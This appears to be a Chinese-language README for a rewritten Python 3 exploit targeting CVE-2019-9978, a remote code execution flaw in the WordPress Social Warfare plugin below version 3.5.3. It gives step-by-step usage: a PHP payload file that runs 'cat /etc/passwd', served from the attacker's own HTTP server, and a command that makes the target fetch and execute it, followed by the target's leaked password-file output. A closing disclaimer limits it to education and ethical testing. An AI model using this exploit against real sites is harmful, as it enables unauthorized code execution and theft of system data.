
WordPress Social Warfare 插件中的一个远程代码执行(RCE)漏洞,影响版本低于 3.5.3。
Social Warfare WordPress 插件中存在一个远程代码执行(RCE)漏洞,影响所有低于 3.5.3 的版本。
原始的公开利用脚本是用旧版本 Python 编写的,在现代环境中已无法正常运行。
我重写了该利用脚本,使其完全兼容 Python 3,更易于使用、理解,并能集成到现代工具链中。
创建一个名为 payload.txt 的文件,内容如下:
<pre>system('cat /etc/passwd')</pre>
使用 Python 提供你的 payload 服务:
python3 -m http.server 8000
这将使你的 payload.txt 可通过以下地址访问:
http://<your-ip>:8000/payload.txt
python3 CVE-2019-9978.py --target http://<target-ip>/wordpress \
--payload-uri http://<your-ip>:8000/payload.txt
如果目标存在漏洞,你将看到类似如下的输出:
[*] Received Response From Server!
[<] Received:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...



🧬 如果这个 payload 让你心情愉悦,不妨点个 ⭐ 让我开心一下。
< 3.5.3⚠️ 免责声明:此仓库仅用于教育和道德测试目的。
未经授权将本利用脚本用于你不拥有的系统是严格禁止的。